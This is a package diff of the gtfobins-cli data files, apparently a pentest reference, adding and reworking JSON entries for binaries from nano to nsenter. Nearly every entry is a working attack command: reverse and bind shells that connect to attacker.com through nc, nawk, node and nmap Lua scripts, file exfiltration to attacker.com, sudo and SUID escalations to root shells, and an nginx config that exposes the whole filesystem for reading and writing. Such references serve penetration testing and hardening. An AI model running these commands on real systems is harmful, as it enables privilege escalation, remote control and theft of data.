gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/nano.json

@@ -2,31 +2,35 @@
   "functions": {
     "shell": [
       {
+        "description": "",
         "code": "nano\n^R^X\nreset; sh 1>&0 2>&0\n"
       },
       {
-        "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
+        "description": "The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.",
         "code": "nano -s /bin/sh\n/bin/sh\n^T\n"
       }
     ],
     "file-write": [
       {
-        "code": "nano [file]\n[data]\n^O\n"
+        "description": "",
+        "code": "nano file_to_write\nDATA\n^O\n"
       }
     ],
     "file-read": [
       {
-        "code": "nano [file]"
+        "description": "",
+        "code": "nano file_to_read\n"
       }
     ],
     "limited-suid": [
       {
-        "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
-        "code": "./nano -s /bin/sh\n/bin/sh\n^T\n"
+        "description": "The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.",
+        "code": "./nano -s \"/bin/sh -p\"\n/bin/sh -p\n^T\n"
       }
     ],
     "sudo": [
       {
+        "description": "",
         "code": "sudo nano\n^R^X\nreset; sh 1>&0 2>&0\n"
       }
     ]

gtfo/data/nasm.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nnasm -@ $LFILE\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./nasm -@ $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo nasm -@ $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/nawk.json

@@ -2,44 +2,50 @@
   "functions": {
     "shell": [
       {
-        "code": "nawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "nawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "nawk 'BEGIN {\n    s = \"/inet/tcp/0/[host]/[port]\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nnawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {\n    s = \"/inet/tcp/0/\" RHOST \"/\" RPORT;\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
-        "code": "nawk 'BEGIN {\n    s = \"/inet/tcp/[port]/0/0\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell.",
+        "code": "LPORT=12345\nnawk -v LPORT=$LPORT 'BEGIN {\n    s = \"/inet/tcp/\" LPORT \"/0/0\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
       }
     ],
     "file-write": [
       {
-        "code": "nawk 'BEGIN { print \"DATA\" > \"[file]\" }'\n"
+        
+        "code": "LFILE=file_to_write\nnawk -v LFILE=$LFILE 'BEGIN { print \"DATA\" > LFILE }'\n"
       }
     ],
     "file-read": [
       {
-        "code": "nawk '//' \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nnawk '//' \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./nawk '//' \"[file]\""
+        
+        "code": "LFILE=file_to_read\n./nawk '//' \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo nawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "sudo nawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./nawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "./nawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ]
   }

gtfo/data/nc.json

@@ -2,39 +2,39 @@
   "functions": {
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This only works with netcat traditional.",
-        "code": "nc -e /bin/sh [host] [port]\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nnc -e /bin/sh $RHOST $RPORT\n"
       }
     ],
     "bind-shell": [
       {
-        "description": "Run 'nc [host] [port]` on the attacker box to connect to the shell. This only works with netcat traditional.",
-        "code": "nc -l -p [port] -e /bin/sh\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.",
+        "code": "LPORT=12345\nnc -l -p $LPORT -e /bin/sh\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
-        "code": "nc [host] [port] < [file]\n"
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_send\nnc $RHOST $RPORT < \"$LFILE\"\n"
       }
     ],
     "file-download": [
       {
-        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [port]' on the attacker box to send the file.",
-        "code": "nc -l -p [port] > [file]\n"
+        "description": "Fetch a remote file via TCP. Run `nc target.com 12345 < \"file_to_send\"` on the attacker box to send the file.",
+        "code": "LPORT=12345\nLFILE=file_to_save\nnc -l -p $LPORT > \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This only works with netcat traditional.",
-        "code": "sudo nc -e /bin/sh [host] [port]\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nsudo nc -e /bin/sh $RHOST $RPORT\n"
       }
     ],
     "limited-suid": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This only works with netcat traditional.",
-        "code": "./nc -e /bin/sh [host] [port]\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.",
+        "code": "RHOST=attacker.com\nRPORT=12345\n./nc -e /bin/sh $RHOST $RPORT\n"
       }
     ]
   }
-}
+}

gtfo/data/ncdu.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "ncdu\nb\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo ncdu\nb\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./ncdu\nb\n"
+      }
+    ]
+  }
+}

gtfo/data/ncftp.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "ncftp\n!/bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./ncftp\n!/bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo ncftp\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/neofetch.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "TF=$(mktemp)\necho 'exec /bin/sh' >$TF\nneofetch --config $TF\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.",
+        "code": "LFILE=file_to_read\nneofetch --ascii $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "TF=$(mktemp)\necho 'exec /bin/sh' >$TF\nsudo neofetch --config $TF\n"
+      }
+    ]
+  }
+}

gtfo/data/nft.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nnft -f \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./nft -f \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo nft -f \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/nginx.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "This will start a nginx webserver on the specified port. This will provide read/write access to all files on the system. The file path must be absolute.",
+        "code": "PORT=1337\nLFILE=file_to_read\nTFC=$(mktemp)\ncat > $TFC << EOF\nuser root;\nevents {\n  worker_connections 1024;\n}\nhttp {\n  server {\n    listen $PORT;\n    root /;\n    autoindex on;\n    dav_methods PUT;\n  }\n}\nEOF\nsudo nginx -c $TFC\ncurl -s http://localhost:$PORT$LFILE\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "This will start a nginx webserver on the specified port. This will provide read/write access to all files on the system. The file path must be absolute.",
+        "code": "PORT=1337\nLFILE=file_to_read\nTFC=$(mktemp)\ncat > $TFC << EOF\nuser root;\nevents {\n  worker_connections 1024;\n}\nhttp {\n  server {\n    listen $PORT;\n    root /;\n    autoindex on;\n    dav_methods PUT;\n  }\n}\nEOF\nsudo nginx -c $TFC\ncurl -s http://localhost:$PORT$LFILE\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "This will start a nginx webserver on the specified port. This will provide read/write access to all files on the system. The file path must be absolute.",
+        "code": "PORT=1337\nLFILE=file_to_write\nTF=$(mktemp)\necho DATA >$TF\nTFC=$(mktemp)\ncat > $TFC << EOF\nuser root;\nevents {\n  worker_connections 1024;\n}\nhttp {\n  server {\n    listen $PORT;\n    root /;\n    autoindex on;\n    dav_methods PUT;\n  }\n}\nEOF\nsudo nginx -c $TFC\ncurl -X PUT http://localhost:$PORT$LFILE -d @$TF\n"
+      }
+    ]
+  }
+}

gtfo/data/nice.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "nice /bin/sh"
+        
+        "code": "nice /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./nice /bin/sh -p"
+        
+        "code": "./nice /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo nice /bin/sh"
+        
+        "code": "sudo nice /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/nl.json

@@ -1,20 +1,22 @@
 {
-  "description": "The read file content is corrupted by a leading space added to each line.",
   "functions": {
     "file-read": [
       {
-        "code": "nl -bn -w1 -s '' [file]\n"
+        
+        "code": "LFILE=file_to_read\nnl -bn -w1 -s '' $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./nl -bn -w1 -s '' [file]\n"
+        
+        "code": "LFILE=file_to_read\n./nl -bn -w1 -s '' $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo nl -bn -w1 -s '' [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo nl -bn -w1 -s '' $LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/nm.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nnm @$LFILE\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./nm @$LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo nm @$LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/nmap.json

@@ -12,48 +12,54 @@
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "TF=$(mktemp)\necho 'local s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\",[port]);\nwhile true do\n  local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));t:send(b);\nend;\nf:close();t:close();' > $TF\nnmap --script=$TF\n"
+        "description": "Run ``nc -l -p 12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nTF=$(mktemp)\necho 'local s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\nwhile true do\n  local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));t:send(b);\nend;\nf:close();t:close();' > $TF\nnmap --script=$TF\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
-        "code": "TF=$(mktemp)\necho 'local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",[port]));\nlocal c=s:accept();\nwhile true do\n  local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));c:send(b);\nend;c:close();f:close();' > $TF\nnmap --script=$TF\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell.",
+        "code": "export LPORT=12345\nTF=$(mktemp)\necho 'local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\nlocal c=s:accept();\nwhile true do\n  local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));c:send(b);\nend;c:close();f:close();' > $TF\nnmap --script=$TF\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Send a local file via TCP. Run 'socat -v tcp-listen:8080,reuseaddr,fork -' on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.",
-        "code": "nmap -p [port] [host] --script http-put --script-args http-put.url=/,http-put.file=[file]\n"
+        "description": "Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.",
+        "code": "RHOST=attacker.com\nRPORT=8080\nLFILE=file_to_send\nnmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE\n"
       },
       {
-        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
-        "code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", 'rb')\nlocal d=f:read(\"*a\")\nio.close(f);\nlocal s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\",[port]);\nt:send(d);\nt:close();' > $TF\nnmap --script=$TF\n"
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nTF=$(mktemp)\necho 'local f=io.open(os.getenv(\"LFILE\"), 'rb')\nlocal d=f:read(\"*a\")\nio.close(f);\nlocal s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\nt:send(d);\nt:close();' > $TF\nnmap --script=$TF\n"
       }
     ],
     "file-download": [
       {
-        "description": "Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., 'php -S 0.0.0.0:8080'. Note that multiple connections are made to the server and the result is placed in '$TF/IP/PORT/PATH'. Also, it is important that the port is a commonly used HTTP like 80 or 8080.",
-        "code": "TF=$(mktemp -d)\nnmap -p [port] [host] --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=[file]\n"
+        "description": "Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`. Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`. Also, it is important that the port is a commonly used HTTP like 80 or 8080.",
+        "code": "RHOST=attacker.com\nRPORT=8080\nTF=$(mktemp -d)\nLFILE=file_to_save\nnmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE\n"
       },
       {
-        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file.",
-        "code": "TF=$(mktemp)\necho 'local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",[port]));\nlocal c=s:accept();\nlocal d,x=c:receive(\"*a\");\nc:close();\nlocal f=io.open(\"[file]\", \"wb\");\nf:write(d);\nio.close(f);' > $TF\nnmap --script=$TF\n"
+        "description": "Fetch a remote file via TCP. Run `nc target.com 12345 < \"file_to_send\"` on the attacker box to send the file.",
+        "code": "export LPORT=12345\nexport LFILE=file_to_save\nTF=$(mktemp)\necho 'local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\nlocal c=s:accept();\nlocal d,x=c:receive(\"*a\");\nc:close();\nlocal f=io.open(os.getenv(\"LFILE\"), \"wb\");\nf:write(d);\nio.close(f);' > $TF\nnmap --script=$TF\n"
       }
     ],
     "file-write": [
       {
-        "code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", \"wb\"); f:write(\"[data]\"); io.close(f);' > $TF\nnmap --script=$TF\n"
+        "description": "",
+        "code": "TF=$(mktemp)\necho 'local f=io.open(\"file_to_write\", \"wb\"); f:write(\"data\"); io.close(f);' > $TF\nnmap --script=$TF\n"
       },
       {
         "description": "The payload appears inside the regular nmap output.",
-        "code": "nmap -oG=[file] [data]\n"
+        "code": "LFILE=file_to_write\nnmap -oG=$LFILE DATA\n"
       }
     ],
     "file-read": [
       {
-        "code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", \"rb\"); print(f:read(\"*a\")); io.close(f);' > $TF\nnmap --script=$TF\n"
+        "description": "",
+        "code": "TF=$(mktemp)\necho 'local f=io.open(\"file_to_read\", \"rb\"); print(f:read(\"*a\")); io.close(f);' > $TF\nnmap --script=$TF\n"
+      },
+      {
+        "description": "The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.",
+        "code": "nmap -iL file_to_read\n"
       }
     ],
     "sudo": [
@@ -73,9 +79,13 @@
       }
     ],
     "suid": [
+      {
+        "description": "Works on older nmap versions.",
+        "code": "./nmap --interactive\n!sh\n"
+      },
       {
         "description": "The payload appears inside the regular nmap output.",
-        "code": "./nmap -oG=[file] [data]\n"
+        "code": "LFILE=file_to_write\n./nmap -oG=$LFILE DATA\n"
       }
     ]
   }

gtfo/data/node.json

@@ -2,56 +2,62 @@
   "functions": {
     "shell": [
       {
-        "code": "node -e 'child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
+        
+        "code": "node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
       }
     ],
     "file-write": [
       {
-        "code": "node -e 'fs.writeFileSync(\"file_to_write\", \"DATA\")'"
+        
+        "code": "node -e 'require(\"fs\").writeFileSync(\"file_to_write\", \"DATA\")'\n"
       }
     ],
     "file-read": [
       {
-        "code": "node -e 'process.stdout.write(fs.readFileSync(\"/bin/ls\"))'"
+        
+        "code": "node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/bin/ls\"))'\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "node -e 'http.get([host], res => res.pipe(fs.createWriteStream([file])))'\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nnode -e 'require(\"http\").get(process.env.URL, res => res.pipe(require(\"fs\").createWriteStream(process.env.LFILE)))'\n"
       }
     ],
     "file-upload": [
       {
         "description": "Send a local file via HTTP POST request.",
-        "code": "node -e 'fs.createReadStream([file]).pipe(http.request([host]))'\n"
+        "code": "export URL=http://attacker.com\nexport LFILE=file_to_send\nnode -e 'require(\"fs\").createReadStream(process.env.LFILE).pipe(require(\"http\").request(process.env.URL))'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "node -e 'sh = child_process.spawn(\"/bin/sh\");\nnet.connect([port], [host], function () {\n  this.pipe(sh.stdin);\n  sh.stdout.pipe(this);\n  sh.stderr.pipe(this);\n})'\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nnode -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(process.env.RPORT, process.env.RHOST, function () {\n  this.pipe(sh.stdin);\n  sh.stdout.pipe(this);\n  sh.stderr.pipe(this);\n})'\n"
       }
     ],
     "bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
-        "code": "node -e 'sh = child_process.spawn(\"/bin/sh\");\nnet.createServer(function (client) {\n  client.pipe(sh.stdin);\n  sh.stdout.pipe(client);\n  sh.stderr.pipe(client);\n}).listen([port])'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell.",
+        "code": "export LPORT=12345\nnode -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n  client.pipe(sh.stdin);\n  sh.stdout.pipe(client);\n  sh.stderr.pipe(client);\n}).listen(process.env.LPORT)'\n"
       }
     ],
     "suid": [
       {
-        "code": "./node -e 'child_process.spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'\n"
+        
+        "code": "./node -e 'require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo node -e 'child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
+        
+        "code": "sudo node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
       }
     ],
     "capabilities": [
       {
-        "code": "./node -e 'process.setuid(0); child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
+        
+        "code": "./node -e 'process.setuid(0); require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
       }
     ]
   }

gtfo/data/nohup.json

@@ -2,22 +2,26 @@
   "functions": {
     "shell": [
       {
-        "code": "nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\""
+        
+        "code": "nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\"\n"
       }
     ],
     "command": [
       {
-        "code": "nohup \"[command]\"\ncat nohup.out\n"
+        
+        "code": "COMMAND='/usr/bin/id'\nnohup \"$COMMAND\"\ncat nohup.out\n"
       }
     ],
-    "sudo": [
+    "suid": [
       {
-        "code": "sudo nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\""
+        
+        "code": "./nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\"\n"
       }
     ],
-    "suid": [
+    "sudo": [
       {
-        "code": "./nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\""
+        
+        "code": "sudo nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\"\n"
       }
     ]
   }

gtfo/data/npm.json

@@ -2,11 +2,17 @@
   "functions": {
     "shell": [
       {
+        
+        "code": "npm exec /bin/sh\n"
+      },
+      {
+        "description": "Additionally, arbitrary script names can be used in place of `preinstall` and triggered by name with, e.g., `npm -C $TF run preinstall`.",
         "code": "TF=$(mktemp -d)\necho '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' > $TF/package.json\nnpm -C $TF i\n"
       }
     ],
     "sudo": [
       {
+        "description": "Additionally, arbitrary script names can be used in place of `preinstall` and triggered by name with, e.g., `npm -C $TF run preinstall`.",
         "code": "TF=$(mktemp -d)\necho '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' > $TF/package.json\nsudo npm -C $TF --unsafe-perm i\n"
       }
     ]

gtfo/data/nroff.json

@@ -3,16 +3,18 @@
     "file-read": [
       {
         "description": "The file is typeset and some warning messages may appear.",
-        "code": "nroff [file]\n"
+        "code": "LFILE=file_to_read\nnroff $LFILE\n"
       }
     ],
     "shell": [
       {
+        
         "code": "TF=$(mktemp -d)\necho '#!/bin/sh' > $TF/groff\necho '/bin/sh' >> $TF/groff\nchmod +x $TF/groff\nGROFF_BIN_PATH=$TF nroff\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp -d)\necho '#!/bin/sh' > $TF/groff\necho '/bin/sh' >> $TF/groff\nchmod +x $TF/groff\nsudo GROFF_BIN_PATH=$TF nroff\n"
       }
     ]

gtfo/data/nsenter.json

@@ -2,13 +2,15 @@
   "functions": {
     "shell": [
       {
-        "code": "nsenter /bin/sh"
+        
+        "code": "nsenter /bin/sh\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo nsenter /bin/sh"
+        
+        "code": "sudo nsenter /bin/sh\n"
       }
     ]
   }
-}
+}